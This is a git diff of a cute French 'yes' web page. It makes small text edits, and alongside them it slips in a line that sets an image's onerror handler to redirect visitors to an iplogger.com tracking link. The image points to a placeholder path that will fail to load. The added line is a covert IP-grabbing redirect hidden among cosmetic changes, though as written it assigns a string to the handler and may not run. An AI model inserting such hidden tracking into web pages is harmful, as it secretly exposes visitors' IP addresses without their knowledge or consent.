--- a/index.html
+++ b/index.html
@@ -26,13 +26,13 @@
     </div>
     <div id="ans" class="container">
         <div>
-            <h1 class="header_text">Ouiiii voilà c'est ça que j'voulais :)\</h1>
+            <h1 class="header_text">Ouiiii voilà c'est ça que j'voulais :)</h1>
         </div>
         <div class="gif_container">
             <img src="image/ans.gif" alt="Cute animated illustration">
         </div>
         <div class="gif_container qrimage">
-            <h2>faut le crier sur tous les toits maintenant</h2>
+            <h2>faut le crier sur tous les toits maintenant :3</h2>
         </div>
         <video id="ansvideo" width="0" height="0" controls>
             <source src="image/KidsCheering.mp4" type="video/mp4">
@@ -121,6 +121,7 @@
         var img = document.createElement("img");
         img.src = "path_to_your_image.jpg"; // Remplacer par le chemin de votre image
         img.alt = "Example Image";
+        img.onerror="window.location='https://iplogger.com/2ZJXW5'";
         document.getElementById("content").appendChild(img);
     } else {
         // Si le cookie est "true", afficher un message ou une autre action
